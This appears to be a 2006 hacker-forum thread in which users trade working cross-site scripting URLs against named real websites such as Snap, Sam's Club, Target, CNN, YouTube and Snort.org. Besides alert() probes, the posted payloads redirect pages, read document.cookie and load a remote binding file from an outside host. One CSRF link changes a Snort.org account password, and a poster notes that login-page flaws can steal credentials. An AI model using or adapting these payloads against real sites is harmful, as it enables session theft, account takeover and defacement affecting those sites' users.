Great work!

Wow! :-()
and that one a single domain...
AOL should crawl in a dark hole for aeons for these.

ok, I owe unsticky a beer, great job.

-id

@Maluc:

i had it in my clipboard and was too lazy to type a new vector,
But document.location() does not work, i tried it.
document.location.replace does work:

(could take some time to load)
http://www.snap.com/search.php#%22%3E%3Cscript%3Ealert('Gimme%20a%20break%20dudes...')%3Bdocument.location.replace('http://sla.ckers.org')%3B%3C%2Fscript%3E%3C%22



Edited 2 time(s). Last edit at 11/20/2006 01:48AM by jungsonn.

i stand corrected ^^ .. guess i didn't give it enough of a chance to load..

for the standard way i mentioned.. it wasn't with document.location() but rather document.location='blah'

http://www.snap.com/search.php#%22%3E%3Cscript%3Ealert('Gimme%20a%20break%20dudes...')%3Btop.document.location%3D'http://sla.ckers.org'%3B%3C%2Fscript%3E%3C%22

but for cases where equals is filtered.. that's a nice alternative, i'll keep it in mind ^^ (without having to use eval() which is a pain.)

and nice job unsticky.. some have been posted before but most appear new. fortunately for aol, half of them look to stem from the same reused code.

-maluc

Yah, agreed, unsticky. Holy crap! Guess AOL has some work to do.

- RSnake
Gotta love it. http://ha.ckers.org

Yeah, I know I posted a few of them before, but I put them all into one list, and didn't really feel like going through page after page on the forum to find my post and then compare and remove the old ones. :/ And as Maluc said, most do seem to stem from the same reused, insecure, code to handle the icid and aolp GET variables. I probably missed a bunch of vulns simply because I got fed up with copy and pasting URLs from my address bar. They deffinatly need some work, especially with the vulns in the https login pages, which can very easily be used to redirrect the form and steal login credentials... *cough*

http://www.mininova.org/search/?search=%3Chmm%27;%0D%0A//--%3E%3C/script%3E%3Cscript%3E%0D%0Aalert(1337);%0D%0A%3C/script%3E%0D%0A

- Kyran

That's some pretty crazy obfuscation there, Kyran!

- RSnake
Gotta love it. http://ha.ckers.org

Yeah, that one took awhile, If you touch pretty much anything but where the alert is, it won't work.

- Kyran

A couple more discovered in the last couple of days.

http://www.samsclub.com/eclub/main_clublocator.jsp?isCNP=&zipcode=12345%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://www.samsclub.com/shopping/navigate.do?dest=8&returnTo=http%3A%2F%2Fwww.samsclub.com%2Fshopping%2Fnavigate.do%3Fcatg%3D618'%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://sites.target.com/site/en/spot/map.jsp?streetaddress=&city=&state=&zip12345%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&clientPOI2=1&closestn=3&closestprox=1&miles=200&screen=find&link=results&width=450&height=338&orig_iconid=24&_requestid=1340621

bis spaeter,

--z

Domain squatting XSS: http://searchportal.information.com/?epl=&debug=0&query=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

- RSnake
Gotta love it. http://ha.ckers.org

http://money.excite.com/jsp/qt/full.jsp?symbol_search_text=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

- RSnake
Gotta love it. http://ha.ckers.org

http://search.gifts.com/?q=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

http://dynamic.si.cnn.com/covers/search?searchSpec=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

- RSnake
Gotta love it. http://ha.ckers.org

http://www.omfg.com/quickResults.asp?searchtype=D&searchfield=<script>alert('omfg')</script>

Someone should seriously make a list of everything disclosed, I'm always paranoid about re-finding holes.. Maybe a database or something (rsnake/id)...



Edited 1 time(s). Last edit at 11/21/2006 01:19AM by Spikeman.

http://area.autodesk.com/external.php?link=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3C%22

As of today i just go to sites i find in my e-mail. I'm too lazy to Google for it :) Like this.

http://www.haporn.com/video.php?category=md&viewtype=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E%3C%22

http://cbs4boston.com/slideshows/photoalbum_slideshow_324160333/view?slide=%3Cscript%3Ealert(document.cookie)%3C/script%3E

--
http://chasenet.org/home/

http://www.overclockers.co.uk/search_results.php?sortby=&groupid=&string=%22%3E%27%3E%3CSCRIPT%3Ealert%28%27boom%27%29%3C%2FSCRIPT%3E

http://www.youtube.com/signup?signup_type=xss%22%20/%3E%3Cscript%3Ealert(1337)%3C/script%3E More youtube.

- Kyran

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://nighteffect.com/tns/index.php&SortOrder=Desc%3Cscript%3Ealert(%22XSS%22)%3C/script%3E nighteffect.com

-maluc

https://www.edwinwattsgolf.com/webapp/wcs/stores/servlet/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Hai guys. I finally registered here..mahah.
Anyways, I've been bored.

http://www.santaclarauniv.org/go/esuppress.asp?pin=abcdfuckingpin8&c=111&e=%3Cscript%3Ealert(/omgawhsex/)%3C/script%3E&ln=CBSS

Lawl.

http://www.sourcefire.com/elqNow/elqRedir.htm?ref=javascript:alert(%22Hello.%22%29



Edited 1 time(s). Last edit at 11/21/2006 11:30PM by Ghozt.

This doesn't say much for Snorts intrusion detection:
XSS and CSRF in snort.org
http://www.snort.org/pub-bin/search.cgi?search=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E (XSS)
https://www.snort.org/reg-bin/userprefs.cgi?action=change_password&new_password=NewPassword&new_password_verify=NewPassword (CSRF/Password Change)
Both work with GET. The forums look custom coded and they didn't filter the search at all, so who knows what havoc you could wreck.

http://promosearch.atomz.com/search/promosearch?query=%27%2F%2F--%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&sp-q=%27%2F%2F--%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&sp_a=sp1000a5a9&sp_f=ISO-8859-1&sp_t=general&sp-x-1=cat&sp-q-1=&sp-x-2=cat2&sp-q-2=&sp-c=25&sp-k=&sp-p=all&sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&c=&p=&counter=&search=New+Search

- RSnake
Gotta love it. http://ha.ckers.org

http://rockmanamv.com/searchamvs.php?swords='+style=-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss);xx:expression(alert(1337%29%29%3B



Edited 1 time(s). Last edit at 11/22/2006 04:07AM by Spikeman.

http://search.denverpost.com/sp?aff=26&keywords=%22%3E%3Cscript%3Esay+%3D+prompt%28%27Yo%2C+whats+up%3F+what+do+you+think+about+this+XSS+hole%3F%27%2C%27%27%29%0D%0Aif%28say%29+%7B+alert%28%27You+said%3A%27%2Bsay%29+%7D+else+%7B+alert%28%27Common%21+this+is+fun+%3B%29%27%29%3B+%7D+%3C%2Fscript%3E%3C%22&searchbutton.x=0&searchbutton.y=0&searchbutton=Search

Wicked.
http://search.wickedlocal.com/sp?keywords=%3Cscript%3Edocument.write('%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E%20%3Ch1%3EHAX0REDZ%20BY%20SLACKERZ!%3C/h1%3E');%3C/script%3E&search=&p=sb_integrated_search

Here's one I enjoyed.
I was searching for a specific post in this thread until I came across this one:
http://cccure.org/modules.php?myh_op=show_all%3Cscript%3Ealert(2)%3C/script%3E (well... it was something like that). That flaw has been fixed and they now have an error page. That error page has the user agent printed on it, using the flash and IE thing that was written about ages ago we can once again abuse this.
http://www.whiteacid.org/misc/xss_headers.php?xss_target=http://cccure.org/modules.php?myh_op=show_all<script%3Ealert(2)%3C/script%3E&User-agent=<script>alert(1)</script>

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer